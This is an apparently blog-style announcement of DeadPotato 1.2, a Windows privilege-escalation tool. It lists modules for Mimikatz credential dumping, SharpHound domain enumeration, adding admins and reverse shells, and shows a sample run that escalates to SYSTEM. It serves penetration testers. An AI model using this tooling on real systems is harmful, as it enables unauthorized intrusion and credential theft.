Cyber security

DeadPotato – Harnessing Advanced System Tools For Security And Administration

The latest iteration of the versatile security tool designed for network administrators and cybersecurity professionals.

This version adds new capabilities like domain data collection for BloodHound and enhanced compatibility with Windows 10.

Learn how to leverage DeadPotato’s suite of modules for system assessment and security exploitation.

This version includes the following changes:

  • sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
  • mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
  • Added banner compatibility for win10.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it’s components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!

C:\Users\lypd0> DeadPotato.exe -sharphound
      _.--,_
   .-'      '-.          _           _ 
  /            \        | \ _  _  _||_) _ _|_ _ _|_ _ 
 '          _.  '       |_/(/_(_|(_||  (_) |_(_| |_(_)
 \      """" /  ~(      Open Source @ github.com/lypd0
  '=,,_ =\__ `  &             -= Version: 1.2 =-
        ""  ""'; \\\ 


_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...

(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640

-={          OUTPUT BELOW         }=-

<..SNIP..>
2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!

(+) Removing SharpHound and exiting.
BinaryMD5 Checksum
DeadPotato-NET4.exeC76954078004EDD81B1836A09F9D0D66
mimikatz.exe (embedded)E930B05EFE23891D19BC354A4209BE3E
[SharpHound.exe]AAF1146EC9C633C4C3FBE8091F1596D8

For more information click here.

Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

MSI Analyzer – Analyzing Windows Installer Files For Vulnerabilities

This Python script for Linux can analyze Microsoft Windows *.msi Installer files and point out…

12 hours ago

BEAR-C2 : Simulated Command And Control Framework For APT Attack Research

Bear C2 is a compilation of C2 scripts, payloads, and stagers used in simulated attacks…

12 hours ago

Bearer – A Quick Guide To Scanning And Securing Your Application

Discover your application security risks and vulnerabilities in only a few minutes. In this guide…

12 hours ago

Waymore – A Comprehensive URL Retrieval And Archival Tool For Advanced Reconnaissance

The idea behind waymore is to find even more links from the Wayback Machine than…

13 hours ago

Pycript – A Versatile Burp Suite Extension For Encryption And Decryption

The Pycript extension for Burp Suite is a valuable tool for penetration testing and security…

13 hours ago

DependencyTrack 4.10.0 – Release Overview And Security Hashes

For official releases, refer to Dependency Track Docs >> Changelogs for information about improvements and…

3 days ago